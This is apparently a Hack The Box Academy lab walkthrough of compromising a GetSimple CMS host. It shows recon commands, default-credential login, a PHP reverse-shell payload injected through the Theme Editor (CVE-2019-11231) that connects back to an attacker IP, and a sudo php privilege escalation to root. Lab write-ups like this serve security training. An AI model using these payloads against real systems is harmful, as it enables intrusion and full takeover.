HTB Academy: Getting Started — GetSimple CMS RCE to Root

Table of contents

Overview

Recon

nmap -sV -sC 10.129.88.95

Results:

nmap scan results
nmap scan results

Accessed the target directly via its IP for the rest of the assessment.

Enumeration

gobuster dir -u http://10.129.88.95 -w /usr/share/wordlists/dirb/common.txt

Notable hits:

gobuster directory enumeration
gobuster directory enumeration

Site identified as GetSimple CMS. Logged into /admin/ with default/guessed creds (admin:admin).

Foothold — CVE-2019-11231

GetSimple CMS’s Theme Editor allows an authenticated admin to edit theme PHP files directly and save them without sanitization — this is CVE-2019-11231, an authenticated RCE.

Steps:

  1. Navigate to Theme → Edit → template.php (Innovation theme)
  2. Inject a reverse shell payload above the existing template code:
<?php if(!defined('IN_GS')){ die('you cannot load this page directly.'); }
system("bash -c 'bash -i >& /dev/tcp/10.10.15.176/9001 0>&1'");
?>
  1. Save changes

Theme Editor with reverse shell payload injected
Theme Editor with reverse shell payload injected

  1. Start a listener:
nc -lvnp 9001
  1. Trigger execution by requesting the site homepage:
curl http://10.129.88.95/

Shell received as www-data.

User Flag

find / -iname "user.txt" 2>/dev/null

Found at /home/mrb3n/user.txt.

cat /home/mrb3n/user.txt

Flag: [REDACTED]

Reverse shell landing as www-data, finding and reading user.txt
Reverse shell landing as www-data, finding and reading user.txt

Privilege Escalation

Stabilized the shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Checked sudo permissions:

sudo -l

Result:

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

php has no restrictions on the code it runs, so it can be used to spawn a root shell via its system() function:

sudo /usr/bin/php -r 'system("/bin/bash");'

-r executes a one-liner instead of dropping into PHP’s interactive REPL; system() then spawns /bin/bash as a subprocess, which inherits root privileges from the sudo-elevated PHP process.

id
uid=0(root) gid=0(root) groups=0(root)

sudo -l output and PHP privesc landing as root
sudo -l output and PHP privesc landing as root

Root Flag

cat /root/root.txt

Flag: [REDACTED]

Reading root.txt as root
Reading root.txt as root

Lessons Learned

· 2 min read